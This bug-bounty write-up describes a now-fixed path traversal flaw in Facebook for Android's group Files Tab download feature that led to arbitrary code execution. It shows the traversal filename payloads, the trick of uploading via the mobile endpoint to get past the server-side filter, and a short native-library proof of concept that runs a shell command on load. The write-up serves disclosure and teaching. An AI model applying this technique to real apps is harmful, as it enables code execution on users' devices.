Arbitrary code execution on Facebook for Android through a download feature
TL;DR
Recently I discovered an ACE on Facebook for Android that can be triaged through download files from the group Files Tab without opening the file.
Background
I was digging into the method that Facebook uses to download files from the group, I found that Facebook uses two different mechanisms to download files. If the user downloads the file from the post itself It will be downloaded via a built-in android service called DownloadManager as far as I know It safe method to download files. If the user decides to download the file from Files Tab It will be downloaded through a different method, In a nutshell, the application will fetch the file and then will save it to the Download directory without any filter.
Notice: the selected code is the fix that Facebook pushed. The vulnerable code was without this code.
Path traversal
The vulnerability was in the second method, security measures were implemented on the server side when uploading the files but It was easy to bypass. Simply the application fetches the download file and for example, saves the file /sdcard/Downloads/FILE_NAME without filtering the FILE_NAME to protect against path traversal attacks. The first idea that came to my mind is to use path traversal to overwrite native libraries which will lead to executing arbitrary code.
I have set up my burp suite proxy then Intercepted the upload file request and modify the filename to ../../../sdcard/PoC then forward the request.
Unfortunately, It wasn’t enough due to the security measures on the server side, my path traversal payload was removed. I decide to play with the payload but unfortunately, no payload worked.
Bypass security measures. (Bypass?)
After many payloads, I wasn’t able to bypass that filter. I came back to browse the application again and may find something useful, It came!
For the first time, I noticed that I can upload files via Facebook mobile application. set up burp suite proxy on my phone, enable white-hat settings on the application to bypass SSL pinning, intercepted upload file request, modify the filename to ../../../sdcard/PoC, the file was uploaded successfully and my payload is in the filename now!
I tried to download the file from the post, but the DownloadManger service is safe as I told so the attack didn’t work. Navigated to the Files Tab, and download the file. And here is our attack. My file was written to /sdcard/PoC!
As I was able to perform path traversal, I can now overwrite the native libraries and perform an ACE attack.
Exploit
To exploit that attack I start a new android NDK project to create a native library and put my arbitrary code on the JNI_OnLoad function to make sure that the evil code will execute when loading the library.
#include <jni.h>
#include <string>
#include <stdlib.h>JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {
system(“id > /data/data/com.facebook.katana/PoC”);
return JNI_VERSION_1_6;
}
I built the project to get my malicious library, then upload it by mobile upload endpoint and renamed it to /../../../../../data/data/com.facebook.katana/lib-xzs/libbreakpad.so
Our exploit now is ready!
PoC Video: https://youtu.be/j0darcE5apo
Timeline
April 29, 2020, at 5:57 AM: Submitted the report to Facebook.
April 29, 2020, at 11:20 AM: Facebook was able to reproduce it.
April 29, 2020, at 12:17 PM: Triaged.
June 16, 2020, at 12:54 PM: The vulnerability has been fixed.
July 15, 2020, at 5:11 PM: Facebook rewarded me!
Have a nice day!
